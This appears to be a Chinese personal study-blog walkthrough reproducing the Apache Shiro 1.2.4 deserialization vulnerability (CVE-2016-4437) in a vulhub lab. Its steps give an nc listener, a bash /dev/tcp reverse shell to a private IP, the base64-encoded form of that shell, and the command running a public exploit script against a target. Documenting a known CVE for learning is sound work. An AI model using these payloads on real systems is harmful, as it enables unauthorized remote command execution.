Apache Shiro 1.2.4反序列化漏洞(CVE-2016-4437)

字数:310字 | 预计阅读时长:1分钟

背景

Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。

复现过程

1、POC下载

http://github.com/insightglacier/Shiro_exploit.git/

2、Nc监听

nc -lvp 4000

3、编写反弹shell

将如下命令拿到http://www.jackson-t.ca/runtime-exec-payloads.html/网站进行编码,

bash -i >& /dev/tcp/192.168.0.103/4000 0>&1

编码后的反弹shell命令

1
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTAzLzQwMDAgMD4mMQ==}|{base64,-d}|{bash,-i}

4、反弹shell

使用第一步下载的POC执行如下命令,IP地址为NC监听地址,-p参数为编码后的反弹shell命令。

1
python shiro_exploit.py -u http://192.168.0.108:8080 -t 3 -p "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTAzLzQwMDAgMD4mMQ==}|{base64,-d}|{bash,-i}"

成功拿到shell

参考链接

http://github.com/vulhub/vulhub/tree/master/shiro/CVE-2016-4437/

http://www.cnblogs.com/panisme/p/12552838.html/

谢谢你请我吃糖果

微信

扫一扫,分享到微信

微信分享二维码
载入天数...载入时分秒...

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

作者是一个极其低调,而又不失内涵的人。 <br> 只因年少轻狂,不知少壮不努力,老大徒伤悲之意,错失高考。 <br> 至此,以“学到老,活到老”,树立终生学习之观念。 <br> 所谓好记性不如烂笔头,我将所学技术记载于此博客。 <br> 此博客就当作是我的学习笔记。 <br> 方便日后复习总结。 <br> 转眼,光阴数十载, <br> 本人已踏入老男人之行列。 <br> 深夜流泪, <br> 往日不堪回首。 <br> 时至今日, <br> 往事已去。 <br> 目光向前, <br> 不负余生。